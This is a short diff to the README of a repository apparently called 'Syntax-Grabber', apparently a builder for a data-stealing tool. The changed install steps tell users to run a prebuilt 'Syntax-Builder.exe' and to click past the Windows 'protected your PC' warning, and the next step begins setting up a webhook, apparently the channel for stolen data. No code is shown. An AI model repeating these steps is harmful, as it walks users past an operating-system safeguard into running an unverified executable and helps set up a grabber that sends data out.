Ree2no/Syntax-Grabber/README.md

 ```
 Once you've downloaded the files extract the folder so it's no longer a .zip file.
 ```
-### 3. Open The setup.bat File:
+### 3. Open The Syntax-Builder.exe File:

 ```
-You dont need to install any modules opening setup.bat will install them for you.
-Then you need to open builder.pyw which will
+You dont need to install any modules opening Syntax-Builder.exe will install them for you.
+If you are prompted with "Windows protected your PC", make sure to click "More Info" then run.
-open the gui.
 ```
 ### 4. Create A Webhook: